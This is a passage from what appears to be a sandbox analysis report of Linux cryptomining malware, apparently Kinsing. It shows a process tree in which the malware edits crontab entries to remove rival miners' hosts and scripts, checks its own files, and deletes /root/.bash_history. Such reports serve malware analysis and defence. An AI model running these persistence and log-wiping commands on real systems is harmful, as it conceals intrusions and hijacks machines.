                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /111.90.159.106/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2559
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /github/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2562
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2561
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2566
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /bigd1ck.com/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2565
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /xmr.ipzse.com/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2569
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /185.181.10.234/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2571
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2575
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /146.71.79.230/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2574
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2573
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2578
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /122.51.164.83/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2577
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2581
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /newdat.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2579
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /lib.pygensim.com/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2583
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2582
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2587
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /t.amynx.com/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2586
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2585
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2590
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /update.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /systemd-service.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2591
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /pg_stat.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2599
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /sleep/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2598
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2597
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2602
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /oka/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2601
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2605
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /linux1213/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2603
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed "/#wget/d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2607
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed "/#curl/d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2610
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2609
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2614
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /zsvc/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2613
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2617
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /givemexyz/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /world/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2619
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2623
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /1.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2622
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /3.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /workers/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
  2⤵
    PID:2627
• /usr/bin/crontab
  crontab -
  2⤵
    • Creates/modifies Cron job
    PID:2632
• /usr/bin/sed
  sed /oracleservice/d
  2⤵
    PID:2631
• /usr/bin/crontab
  crontab -l
  2⤵
    PID:2630
• /usr/bin/grep
  grep -v grep
  2⤵
    PID:2635
• /usr/bin/grep
  grep -e 185.191.32.198
  2⤵
    PID:2634
• /usr/bin/crontab
  crontab -l
  2⤵
    PID:2633
• /usr/bin/crontab
  crontab -
  2⤵
    • Creates/modifies Cron job
    PID:2637
• /usr/bin/rm
  rm -rf /root/.bash_history
  2⤵
    PID:2639
• /usr/bin/awk
  awk "{ print \$1 }"
  1⤵
    PID:1878
• /usr/bin/md5sum
  md5sum /etc/kinsing
  1⤵
    PID:1877
• /usr/bin/awk
  awk "{ print \$1 }"
  1⤵
    PID:2379
• /usr/bin/md5sum
  md5sum /etc/kinsing
  1⤵
    PID:2378
• /usr/bin/awk
  awk "{ print \$1 }"
  1⤵
    PID:2387
• /usr/bin/md5sum
  md5sum /etc/kinsing
  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2391
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                md5sum /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2390
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    md5sum /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2407
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "{ print \$1 }"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2437
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/md5sum
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        md5sum /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2638

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Downloads

